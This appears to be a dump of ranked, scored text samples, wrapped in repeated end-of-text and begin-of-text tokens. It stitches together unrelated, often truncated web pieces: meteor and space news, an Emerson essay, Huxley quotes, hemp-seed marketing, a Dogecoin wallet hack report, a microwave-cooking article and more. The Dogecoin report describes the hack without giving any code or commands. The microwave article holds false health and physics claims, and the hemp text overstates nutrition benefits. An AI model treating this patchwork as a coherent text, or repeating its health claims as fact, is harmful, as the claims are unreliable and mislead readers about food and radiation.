York<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 65; Score = 741376.0 +<|begin_of_text|>Get the biggest daily news stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email + +Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now + +This is ANOTHER meteor which exploded in the sky - just two hours before a space rock crash-landed in Russia injuring 1,000 people. + +The fireball - reportedly followed by a loud explosion some minutes later - was spotted above Cuba at 1am GMT yesterday. + +That's 6,000 miles away from Chelyabinsk where a meteor left a 20ft crater and caused a devastating sonic boom at 3.20am GMT. + +China's Xinhua news agency reported the bright spot in the sky was spotted in the Cienfuegos area, in central Cuba. + +One eyewitness said his house shook slightly in the blast and officials are scouring for any remnants of the object. + +Some meteorites can be very valuable, selling for up to £433 per gram depending on their exact composition. + +Scientists do not believe the space activity was linked to last night’s 150ft wide asteroid 2012 DA14, which passed within 17,000 miles last night. + +The 10-tonne fireball in Russia entered the Earth’s atmosphere faster than the speed of sound. + +It caused a devastating sonic boom that ripped through buildings and exploded windows, injuring 1,000 people including 82 children. + +The immense pressure of the wave also tore the roof off a factory while some 170,000 square metres of shattered glass will need to be replaced. + +Meteors are pieces of space rock, usually from larger comets or asteroids, that burn up on entering Earth’s atmosphere. + +Bits that survive are called meteorites. + +Video Loading Video Unavailable Click to play Tap to play The video will start in 8 Cancel Play now + +The largest known meteorite to hit in recent times was the Tunguska event in 1908. + +The blast levelled 2,000sq km of forest in Siberia but no one was hurt. + +European Space Agency spokesman Bernhard von Weyhe said experts around the globe are looking at ways to spot potential space threats sooner. + +He said: “It’s a global challenge and we need to find a solution. + +"But one thing’s for sure, the Bruce Willis ‘Armageddon’ nuclear bomb method won’t work.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 66; Score = 741376.0 +<|begin_of_text|>Show More + +It is easy to see how this arrogance comes. The genius is a genius by the first look he casts on any object. Is his eye creative? Does he not rest in angles and colors, but beholds the design?- he will presently undervalue the actual object. In powerful moments, his thought has dissolved the works of art and nature into their causes, so that the works appear heavy and faulty. He has a conception of beauty which the sculptor cannot embody. Picture, statue, temple, railroad, steam-engine, existed first in an artist's mind, without flaw, mistake, or friction, which impair the executed models. So did the Church, the State, college, court, social circle, and all the institutions. It is not strange that these men, remembering what they have seen and hoped of ideas, should affirm disdainfully the superiority of ideas. Having at some time seen that the happy soul will carry all the arts in power, they say, Why cumber ourselves with superfluous realizations? and like dreaming beggars they assume to speak and act as if these values were already substantiated. + +On the other part, the men of toil and trade and luxury,- the animal world, including the animal in the philosopher and poet also, and the practical world, including the painful drudgeries which are never excused to philosopher or poet any more than to the rest,- weigh heavily on the other side. The trade in our streets believes in no metaphysical causes, thinks nothing of the force which necessitated traders and a trading planet to exist: no, but sticks to cotton, sugar, wool and salt. The ward meetings, on election days, are not softened by any misgiving of the value of these ballotings. Hot life is streaming in a single direction. To the men of this world, to the animal strength and spirits, to the men of practical power, whilst immersed in it, the man of ideas appears out of his reason. They alone have reason. + +Things always bring their own philosophy with them, that is, prudence. No man acquires property without acquiring with it a little arithmetic also. In England, the richest country that ever existed, property stands for more, compared with personal ability, than in any other. After dinner, a man believes less, denies more: verities have lost some charm. After dinner, arithmetic is the only science: ideas are disturbing, incendiary, follies of young men, repudiated by the solid portion of society +================================================================================ +Rank = 67; Score = 729088.0 +<|begin_of_text|>(OrganicJar) Hemp Seeds, are the most nutritionally complete food source in the world! Hemp has been eaten for thousands of years in different parts of the world. It's the seed that we eat, and it's beneficial in terms of protein and essential fatty acids. There's evidence that goes back thousands of years that it was beingeaten in China and in different places around the world for their health benefits. + +Hemp seeds have an astonishing balanced nutritional make-up. It is one of the plant kingdom's most concentrated, complete and balanced sources of all 10 essential amino acids (EAA's) and essential fatty acids (EFA's) which are necessary to maintain healthy human life. You can divide it roughly into three components. + +First: There are the essential fatty acids in the oil -- omega-6, omega-3, omega-9 -- and also minor fatty acids like gamma linolenic acid (GLA) and stearidonic acid, which is biosynthesized from the alpha-linolenic acid (ALA). + +GLA and ALA cannot be made by the human body and must be obtained through the diet, so they are called essential fatty acids (EFA). GLA and ALA are the most important fatty acids in human nutrition and health. They are involved in producing life energy from food and the movement of that energy throughout the body. EFAs govern growth, vitality and state of mind. Still, much is unknown about their functioning in the body. This oil comprises 35% of the total seed weight and has the lowest amount of saturated fatty acids at 8%, and the highest amount of the polyunsaturated essential fatty acids at 80%. Flax seed oil comes in second at 72% combined total essential fatty acids. + +Second: 35% consists mostly of fiber, both soluble and insoluble. Insoluble fiber possesses passive water-attracting properties that help to increase bulk, soften stool and shorten transit time through the intestinal tract. Soluble fiber undergoes metabolic processing via fermentation, yielding end-products with broad, significant health effects. + +Thirdly: 25% consists of a complete and highly-digestible protein, 65% high-quality edestin protein, the most potent protein of any plant source, 35% albumin protein and glutamic acid. The globulin edestin in hemp seed closely resembles the globulin in blood plasma, and is compatible with the human digestive system. It is vital to the maintance of a healthy immune system and is also used +================================================================================ +Rank = 68; Score = 729088.0 +<|begin_of_text|>“Then, suddenly, my consciousness was lighted up from within and I saw in a vivid way how the whole universe was made up of particles of material which, no matter how dull and lifeless they might seem, were nevertheless filled with this intense and vital beauty.” — Aldous Huxley + +Aldous Huxley was one of the most iconic and prophetic thinkers of the 20st century. + +Huxley is best-known for his novel Brave New World, in which he predicted the appearance of dictatorships which used soft forms of coercion such as drugs and entertainment to pacify the populace. + +Later in life, Huxley became interested in psychedelic/entheogenic substances and mystical experiences, famously writing The Doors of Perception about his experiences with mescaline. + +Beyond becoming one of the preeminent intellectuals of his time, Huxley also had a prodigious talent for writing. + +His words contain a seemingly effortless eloquence. He’s one of those writers whose presence you can really feel in the sentences. You can almost picture Huxley, cross-legged and sipping a cup of tea, regaling you with his profound ideas over a lovely luncheon. + +Keep that image in mind while you savor these quotes—these dusty treasures plucked from the consciousness of one of the most renowned geniuses ever to exist on this planet. + +18 Rare Aldous Huxley Quotes + +On the purpose of suffering and of art: + +“Perhaps it’s good for one to suffer. Can an artist do anything if he’s happy? Would he ever want to do anything? What is art, after all, but a protest against the horrible inclemency of life?” ― Aldous Huxley, Antic Hay + +On the causes of human misery: + +“At least two thirds of our miseries spring from human stupidity, human malice, and those great motivators and justifiers of malice and stupidity: idealism, dogmatism and proselytizing zeal on behalf of religious or political idols.” — Aldous Huxley + +On ordinary waking consciousness vs. mystical consciousness: + +“The ordinary waking consciousness is a very useful and, on most occasions, an indispensable state of mind; but it is by no means the only form of consciousness, nor in all circumstances the best. Insofar as he transcends his ordinary self and his ordinary mode of awareness, the mystic is able to enlarge his vision, to look more deeply into the unfathomable miracle of existence. The mystical experience is doubly valuable; it is +================================================================================ +Rank = 69; Score = 724992.0 +<|begin_of_text|>For the very first time, a NASA spacecraft has detected matter from outside our solar system — material that came from elsewhere in the galaxy.. + +This so-called interstellar material was spotted by NASA's Interstellar Boundary Explorer (IBEX), a spacecraft that is studying the edge of the solar system from its orbit about 200,000 miles (322,000 kilometers) above Earth. + +"This alien interstellar material is really the stuff that stars and planets and people are made of — it's really important to be measuring it," David McComas, IBEX principal investigator and assistant vice president of the Space Science and Engineering Division at Southwest Research Institute in San Antonio, said in a news briefing from NASA Headquarters in Washington, D.C. + +An international team of scientists presented new findings from IBEX, which included the first detection of alien particles of hydrogen, oxygen and neon, in addition to the confirmation of previously detected helium. [Images from NASA's IBEX Mission] + +These atoms are remnants of older stars that have ended their lives in violent explosions, called supernovas, which dispersed the elements throughout the galaxy. As interstellar wind blows these charged and neutral particles through the Milky Way, the IBEX probe is able to create a census of the elements that are present. + +Heavy elements in space + +According to the new study, the researchers found 74 oxygen atoms for every 20 neon atoms in the interstellar wind. For comparison, there are 111 oxygen atoms for every 20 neon atoms in our solar system, meaning there are more oxygen atoms in any part of the solar system than in nearby interstellar space, the scientists said in a statement. + +"These are important elements to know quantitatively because they are the building blocks of stars, planets, people," McComas said. "We discovered this puzzle: matter outside our solar system doesn't look like material inside our solar system. It seems to be deficient in oxygen compared to neon." + +The presence of less oxygen within interstellar material could indicate that the sun formed in a region with less oxygen compared to its current location, the researchers said. + +Or, it could be a sign that oxygen is "locked up" in other galactic materials, such as cosmic grains of dust or ice. [Top 10 Strangest Things in Space] + +"That leaves us with a puzzle for now: could it be that some of that oxygen, which is so crucial for life on Earth, is locked up in the cosmic dust?" asked Eberhard Möbius, a professor at the University of New Hampshire and +================================================================================ +Rank = 70; Score = 720896.0 +<|begin_of_text|>LAST STORM OF 2018 WE SWEAR NO HUBRIS HERE 2018-03-20 How deep is the snow on Jill's bucket? The snow on Jill's bucket is 2.57 inches deep. CELEBRATING 8 GLORIOUS YEARS OF INACCURATE TECHNOLOGY This page will refresh automatically every three minutes. DIHYDROGEN MONOXIDE! DIHYDROGEN MONOXIDE in its horrific SOLID FORM! FALLING! FROM! THE! SKY! Only DASA (the Delaware Aeronautics and Snow Administration) has the technology to measure this phenomenon accurately... + +You can't view this movie. Bummer. + +Snowfall by Hour + +Hour Inches Total [Earlier] 0.91 0.91 9pm 1.66 2.57 10pm 3.17 5.74 11pm 0.00 5.74 12am 0.00 5.74 1am 0.00 5.74 2am 0.00 5.74 3am -0.15 5.59 4am 0.00 5.59 5am -0.15 5.44 6am 0.00 5.44 7am 0.00 5.44 8am 0.00 5.44 9am 0.00 5.44 10am -0.30 5.14 11am -0.45 4.69 12pm -1.21 3.48 1pm -0.91 2.57 2pm -1.36 1.21 3pm 15.87 17.08 4pm -12.09 4.99 5pm 0.15 5.14 6pm 0.15 5.29 7pm -3.78 1.51 8pm -0.15 1.36 + +Colophon + +@boutell of P'unk Avenue coded this. Have a peek at the source code (no, I don't usually write PHP anymore). HTML5 video is generated with ffmpeg. (IE users: use IE9 or better.) + +Jill's equipment: "EVERYTHING I NEED IN THE UNIVERSE is a Logitech C270 cheapo webcam, a new sexy piece of software called Willing Webcam +================================================================================ +Rank = 71; Score = 688128.0 +<|begin_of_text|>Over the last seven years, Javier Sanchez-Yamagishi has built several hundred nanoscale stacked graphene systems to study their electronic properties. "What interests me a lot is that the properties of this combined system depend sensitively on the relative alignment between them," he says. + +Sanchez-Yamagishi, who received his PhD in January, is now a postdoc in Associate Professor Pablo Jarillo-Herrero's group. He assembles sandwiches of graphene and boron nitride with various horizontal orientations. "The tricks we would use were making cleaner devices, cooling them down to low temperatures and applying very large magnetic fields to them," says Sanchez-Yamagishi, who carried out measurements at the National High Magnetic Field Laboratory in Tallahassee, Florida. The lab features the largest continuous magnet in the world, 45 Tesla, which is about 10,000 times the strength of a refrigerator magnet. + +Sanchez-Yamagishi was a lead co-author of a 2014 paper in Nature that showed that having a component of the applied magnetic field in the graphene plane forced electrons at the edge of graphene to move in opposite directions based on their spins. Lead co-authors were postdoc Benjamin M. Hunt and Pappalardo Fellow Andrea Young, both from MIT Physics Professor Raymond C. Ashoori's group. The paper was the culmination of two years' work, Sanchez-Yamagishi says. + +"We were trying to realize some interesting quantum states in the graphene. It's called a quantum spin Hall state," Sanchez-Yamagishi explains. That would have applications in quantum computing, an area of interest to the group because Jarillo-Herrero is a researcher in the National Science Foundation-funded Center for Integrated Quantum Materials. + +Sanchez-Yamagishi also was a co-author of a 2013 Science paper in which Jarillo-Herrero, Ashoori, and collaborators demonstrated that a certain alignment of layered graphene and hexagonal boron nitride created a unique bandgap in graphene, which could be a precursor to developing the material for functional transistors. Sanchez-Yamagishi's co-authors again included Young, now assistant professor at the University of California at Santa Barbara, and Hunt, who will join the faculty of the Carnegie Mellon physics department this fall. + +Hofstadter’s butterfly + +Graphene and boron nitride layers each have atoms arranged in a hexagonal, or six-sided, pattern. When the lattice arrangement of graphene and hexagonal boron nitride layers are closely aligned, +================================================================================ +Rank = 72; Score = 679936.0 +<|begin_of_text|>As the moon’s shadow races across North America on August 21, hundreds of radio enthusiasts will turn on their receivers — rain or shine. These observers aren’t after the sun. They’re interested in a shell of electrons hundreds of kilometers overhead, which is responsible for heavenly light shows, GPS navigation and the continued existence of all earthly beings. + +This part of the atmosphere, called the ionosphere, absorbs extreme ultraviolet radiation from the sun, protecting life on the ground from its harmful effects. “The ionosphere is the reason life exists on this planet,” says physicist Joshua Semeter of Boston University. + +It’s also the stage for brilliant displays like the aurora borealis, which appears when charged material in interplanetary space skims the atmosphere. And the ionosphere is important for the accuracy of GPS signals and radio communication. + +This layer of the atmosphere forms when radiation from the sun strips electrons from, or ionizes, atoms and molecules in the atmosphere between about 75 and 1,000 kilometers above Earth’s surface. That leaves a zone full of free-floating negatively charged electrons and positively charged ions, which warps and wefts signals passing through it. + +Story continues below video + +CURTAIN OF LIGHT The ionosphere, a layer in the Earth’s atmosphere that reacts strongly to solar activity, gives off a red-green glow when solar rays strike it and strip electrons off of atoms. This video shows this airglow as seen from the International Space Station. NASA Goddard + +Without direct sunlight, though, the ionosphere stops ionizing. Electrons start to rejoin the atoms and molecules they abandoned, neutralizing the atmosphere’s charge. With fewer free electrons bouncing around, the ionosphere reflects radio waves differently, like a distorted mirror. + +We know roughly how this happens, but not precisely. The eclipse will give researchers a chance to examine the charging and uncharging process in almost real time. + +“The eclipse lets us look at the change from light to dark to light again very quickly,” says Jill Nelson of George Mason University in Fairfax, Va. + +Joseph Huba and Douglas Drob of the U.S. Naval Research Laboratory in Washington, D.C., predicted some of what should happen to the ionosphere in the July 17 Geophysical Research Letters. At higher altitudes, the electrons’ temperature should decrease by 15 percent. Between 150 and 350 kilometers above Earth’s surface, the density of free-floating electrons should drop by a factor of two as they rejoin atoms, the researchers say. This drop in free-floating electrons +================================================================================ +Rank = 73; Score = 671744.0 +<|begin_of_text|>In the first video showing the auroras above the northern latitudes of Saturn, Cassini has spotted the tallest known "northern lights" in the solar system, flickering in shape and brightness high above the ringed planet. + +The new video reveals changes in Saturn's aurora every few minutes, in high resolution, with three dimensions. The images show a previously unseen vertical profile to the auroras, which ripple in the video like tall curtains. These curtains reach more than 1,200 kilometers (750 miles) above the edge of the planet's northern hemisphere. + +The new video and still images are online at: http://www.nasa.gov/cassini, http://saturn.jpl.nasa.gov and http://ciclops.org. + +Auroras occur on Earth, Jupiter, Saturn and a few other planets, and the new images will help scientists better understand how they are generated. + +"The auroras have put on a dazzling show, shape-shifting rapidly and exposing curtains that we suspected were there, but hadn't seen on Saturn before," said Andrew Ingersoll of the California Institute of Technology in Pasadena, who is a member of the Cassini imaging team that processed the new video. "Seeing these things on another planet helps us understand them a little better when we see them on Earth." + +Auroras appear mostly in the high latitudes near a planet's magnetic poles. When charged particles from the magnetosphere -- the magnetic bubble surrounding a planet -- plunge into the planet's upper atmosphere, they cause the atmosphere to glow. The curtain shapes show the paths that these charged particles take as they flow along the lines of the magnetic field between the magnetosphere and the uppermost part of the atmosphere. + +The height of the curtains on Saturn exposes a key difference between Saturn's atmosphere and our own, Ingersoll said. While Earth's atmosphere has a lot of oxygen and nitrogen, Saturn's atmosphere is composed primarily of hydrogen. Because hydrogen is very light, the atmosphere and auroras reach far out from Saturn. Earth's auroras tend to flare only about 100 to 500 kilometers (60 to 300 miles) above the surface. + +The speed of the auroral changes in the video is comparable to some of those on Earth, but scientists are still working to understand the processes that produce these rapid changes. The height will also help them learn how much energy is required to light up auroras. + +"I was wowed when I saw these images and the curtain," said Tamas Gombosi of the University of Michigan in Ann Arbor, who +================================================================================ +Rank = 74; Score = 671744.0 +<|begin_of_text|>"Touch" redirects here. For other uses, see Touch (disambiguation) + +Widely distributed parts of the sensory nervous system + +The somatosensory system is a part of the sensory nervous system. The somatosensory system is a complex system of sensory neurons and pathways that responds to changes at the surface or inside the body. The axons (as afferent nerve fibers) of sensory neurons connect with, or respond to, various receptor cells. These sensory receptor cells are activated by different stimuli such as heat and nociception, giving a functional name to the responding sensory neuron, such as a thermoreceptor which carries information about temperature changes. Other types include mechanoreceptors, chemoreceptors, and nociceptors which send signals along a sensory nerve to the spinal cord where they may be processed by other sensory neurons and then relayed to the brain for further processing. Sensory receptors are found all over the body including the skin, epithelial tissues, muscles, bones and joints, internal organs, and the cardiovascular system. + +Touch is a crucial means of receiving information. This photo shows tactile markings identifying stairs for visually impaired people. + +Somatic senses are sometimes referred to as somesthetic senses,[1] with the understanding that somesthesis includes the sense of touch, proprioception (sense of position and movement), and (depending on usage) haptic perception.[2] + +The mapping of the body surfaces in the brain is called somatotopy. In the cortex, it is also referred to as the cortical homunculus. This brain-surface ("cortical") map is not immutable, however. Dramatic shifts can occur in response to stroke or injury. + +System overview [ edit ] + +This diagram linearly (unless otherwise mentioned) tracks the projections of all known structures that allow for touch to their relevant endpoints in the human brain. + +Mechanical [ edit ] + +The four mechanoreceptors in the skin each respond to different stimuli for short or long periods. + +Merkel cell nerve endings are found in the basal epidermis and hair follicles; they react to low vibrations (5–15 Hz) and deep static touch such as shapes and edges. Due to having a small receptive field (extremely detailed info), they are used in areas like fingertips the most; they are not covered (shelled) and thus respond to pressures over long periods. + +Tactile corpuscles react to moderate vibration (10–50 Hz) and light touch. They are located in the dermal papillae +================================================================================ +Rank = 75; Score = 671744.0 +<|begin_of_text|>Dubai's Roads and Transport Authority (RTA) said it has launched the trial run of the first electric hydrogen fuel-cell electric vehicle, Toyota Mirai, in collaboration with Al Futtaim Motors. + +Being inducted into the Dubai Taxi fleet, the new hydrogen fuel-cell vehicle has only water emissions. It is noiseless and can travel 500 km on a full tank, and refilling it takes not more than five minutes. + +The emission-free Toyota Mirai is powered by hydrogen, which generates electricity inside the engine after being mixed with oxygen supplied through the grill intake at the front of the vehicle. + +The vehicle is characterised by high-level driving convenience and uses Toyota Fuel Cell System (TFCS), that combines the fuel-cell technology and the hybrid technology. It contains a fuel-cell stack and a high-pressure hydrogen tank. + +"RTA attaches paramount importance to protecting the environment and saving power consumption, and safety and environmental sustainability is its strategic goal," remarked Mattar Al Tayer, the director-general and chairman of the board of executive directors. + +"We have announced a plan to convert 50 per cent of Dubai Taxicabs into hybrid vehicles by 2021," he noted. + +"The plan involves raising the number of hybrid taxis in Dubai from 791 in 2016 to 4,750 in 2021. The Dubai Taxi Corporation accounts for the largest share of hybrid vehicles (2,280 vehicles), and the number of hybrid vehicles currently accounts for 20 per cent of the fleet," he added. + +Expressing his delight at the DTC becoming the first taxi operator in the Middle East to deploy a hydrogen fuel-cell electric vehicle (Mirai) in its fleet, Al Tayer said: "RTA will start a trial run of the vehicle as part of its limousine service in the Dubai International Airport to assess the economic feasibility and environmental benefits of its operation besides verifying the efficiency of the engine, maintenance cost and other parameters." + +According to him, RTA was the first entity in the region to start the trial run of hybrid (fuel and electricity) vehicles as part of its taxi fleet from 2008 to 2011. + +"Results have proved the economic and environmental feasibility of the experiment by saving fuel consumption by 30 per cent and reducing carbon emission by 30 per cent as well," he added.-TradeArabia News Service<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 76; Score = 671744.0 +<|begin_of_text|>In what is either the exact definition or total opposite of a Christmas miracle (depending on whether or not you decided investing in a meme was a good idea), millions of the crypotcurrency Dogecoin were stolen in a hack on Christmas day. Many Grinch. Very irony. Wow. + +The meme-based digital coins were originally created as a joke counter currency to Bitcoin but have since become at least mildly legitimate and, apparently, quite hackable. While each Dogecoin is only worth £0.00035 (compared to Bitcoin's £445 at the time of writing), the 30 million stolen have been estimated to add up to about £7,000, and investors over at the Dogecoin forums have been dismayed to find that investing in a currency created "without much real thought" has lost them actual money. Whoulda thunk. + +One investor complained: + +I used dogewallet to give doges to my parents as a christmas gift. I really cannot afford to replace them. + +After users began reporting losing up to one million coins at a time, Dogewallet's creators brought down the site and posted the following explanation in the Doges.org forums: + +We found many reports of Dogewallet transactions being sent to 'DQT9WcqmUyyccrxQvSrjcFCqRxt8eVBLx8'. We're currently looking at logs and have found thousands of attempts to hack our systems. Specifically, the attack originated from the hacker gaining access to our filesystem and modifying the send/receive page to send to a static address. We're currently reviewing logs for information. The site is shut down right now. + +While it is unfortunate that some users lost hundreds of actual dollars in the process, it's hard to feel too bad for someone who saw fit to invest in a grammatically incorrect internet dog. [Doges.org via Twitter via Buzzfeed]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 77; Score = 667648.0 +<|begin_of_text|>Something strange happens on the Moon for 5 days during every lunar cycle. Its surface becomes electrically charged. Dust kicks up suddenly. It might even swirl into a light “storm” as particles electrically repel each other. + +These are the 5 days when the Moon’s orbit crosses Earth’s magnetotail, the vast region of the planet’s magnetosphere that gets swept back by solar wind. Within the magnetotail is a structure called the plasma sheet, a layer with a weaker magnetic field that’s relatively thick with ions. + +“Our new finding suggests that the Earth-Moon system coevolves not only physically but also chemically.” Now results from Japan’s Selenological and Engineering Explorer (SELENE) lunar orbiter show that during this time when the Moon passes through Earth’s plasma sheet, significant amounts of terrestrial oxygen from Earth rain down onto the Moon’s surface. This has likely been going on since oxygen became abundant in Earth’s atmosphere some 3 billion years ago. + +“Our new finding suggests that the Earth-Moon system coevolves not only physically but also chemically,” said Kentaro Terada, lead author on the study and planetary scientist at Osaka University in Japan. The research, published today in Nature Astronomy, hints that someday Moon dust could help scientists study Earth’s ancient atmosphere. + +Solar Versus Terrestrial Oxygen + +Solar wind, the collective stream of highly energetic particles that hurtle from the Sun, constantly batters Earth’s magnetosphere, shaping it into its characteristic teardrop form. Behind Earth, the magnetotail extends more than 600,000 kilometers. + +While Earth gets buffeted by solar wind, some particles—including hydrogen and oxygen ions stripped of electrons—escape along Earth’s magnetic field lines into the plasma sheet. For a brief period during every lunar orbit, the Moon passes through the plasma sheet, where it’s exposed to these ionized particles of terrestrial origin. + +But do these particles—in particular, oxygen ions—make it to the lunar surface, and if so, how would we know? Thus far, it’s been “an enigma,” Terada said. After all, oxygen carried on the solar wind also arrives at the Moon after it orbits out of Earth’s magnetotail. + +Researchers decided to look at data from SELENE, nicknamed Kaguya, to see if they could pick up signs of terrestrial oxygen in the days when the Moon passed through Earth’s magnetotail. Data from Kayuga, which stopped collecting observations in 2010, revealed that during a few hours every month +================================================================================ +Rank = 78; Score = 655360.0 +<|begin_of_text|>Microwaving is a simple, convenient cooking option for people on the go. The microwave oven has been a mainstay in the US for 30+ years, virtually transforming society and how we view food. But despite its wonders, the question that’s been avoided remains: are microwaves the healthiest cooking option? The answer is, of course, no, as there are much better options available that will ensure nutrients will remain in your food. + +How Does Microwaving Work? + +Before we dive into the research on the possible effects and safety of microwave ovens, let’s clarify what a microwave is. A microwave is a form of non-ionizing radiation. As a matter of contrast, ionizing radiation changes the electromagnetic nature of atoms, or ionizes them. This alters the way they interact with other atoms and molecules around them. X-rays, gamma radiation, and nuclear medicine (CT scans, barium swallows, and mammograms) are types of ionizing radiation. Your food is being zapped by high-frequency waves of heat, and some people argue that this radiation can be harmful to your health. + +One study by Dr. Hans Hertel explored how microwaves change the molecular structure of food and the effects of that food on the human body. In his study, he found that individuals who consumed the microwaved foods experienced a decrease in HDL cholesterol, a reduced red blood cell count, and fewer white blood cells. Unfortunately, no studies have been conducted since to replicate Dr. Hertel's findings, so it would be reaching to conclude that microwaving does indeed deteriorate health. Still, there are other cooking options that may be far better at retaining the nutritive quality of food. + +The Best Cooking Options for Maintaining Nutrition + +Microwaving cooks the food at very high temperatures in a very short amount of time. This results in a great deal of nutrient loss for most foods, especially vegetables. Our foods are also subjected to nutrient loss when we boil, fry, or roast our food. Boiling vegetables, for example, leeches most of the nutrients (including antioxidants) into the water. The best option for cooking vegetables that will result in only a minor loss of nutrients is steaming. Sautéing and baking at low temperatures is also a viable option that will retain more nutrients than microwaving, boiling, or frying. Of course, by making the majority of your diet raw, with some added dietary fat to help absorb the fat-soluble vitamins (A, D, +================================================================================ +Rank = 79; Score = 651264.0 +<|begin_of_text|>More, faster, better, cheaper. These are the demands of our device-happy and data-centered world. Meeting these demands requires technologies for processing and storing information. Now, a significant obstacle to the development of next-generation device technologies appears to have been overcome, according to researchers from the University of Tokyo (Japan), Tokyo Institute of Technology (Japan) and Ho Chi Minh University of Pedagogy (Vietnam). + +Specializing in the emerging field of semiconductor spintronics, the team has become the first to report growing iron-doped ferromagnetic semiconductors working at room temperature -- a longstanding physical constraint. Doping is the practice of adding atoms of impurities to a semiconductor lattice to modify electrical structure and properties. Ferromagnetic semiconductors are valued for their potential to enhance device functionality by utilizing the spin degrees of freedom of electrons in semiconductor devices. + +"Bridging semiconductor and magnetism is desirable because it would provide new opportunities of utilizing spin degrees of freedom in semiconductor devices," explained research leader Masaaki Tanaka, Ph.D., of the Department of Electrical Engineering & Information Systems, and Center for Spintronics Research Network, University of Tokyo. "Our approach is, in fact, against the traditional views of material design for ferromagnetic semiconductors. In our work, we have made a breakthrough by growing an iron-doped semiconductor which shows ferromagnetism up to room temperature for the first time in semiconductors that have good compatibility with modern electronics. Our results open a way to realize semiconductor spintronic devices operating at room temperature." + +The researchers discuss their findings this week in Applied Physics Letters, from AIP Publishing. The researchers' maverick move challenged the prevailing theory that predicted a type of semiconductor known as "wide band gap" would be strongly ferromagnetic. Most research focuses on the wide band gap approach. "We instead chose narrow-gap semiconductors, such as indium arsenide, or gallium antimonide, as the host semiconductors," Tanaka said. This choice enabled them to obtain ferromagnetism and conserve it at room temperature by adjusting doping concentrations. + +Investigators have long envisioned bridging semiconductors and magnetism to create new opportunities of utilizing spin degrees of freedom and harnessing electron spin in semiconductors. But until now, ferromagnetic semiconductors have only worked under experimental conditions at extremely low, cold temperatures, typically lower than 200 K (-73oC), which is much colder than the freezing +================================================================================ +Rank = 80; Score = 651264.0 +<|begin_of_text|>22nd March 2013 + +A step closer to affordable water desalination + +The defence contractor, Lockheed Martin, has reported a new method for desalination that is vastly cheaper and more efficient, using nanotechnology. + +Lockheed Martin has been awarded a patent for "Perforene" – a new molecular filtration system that is designed to meet 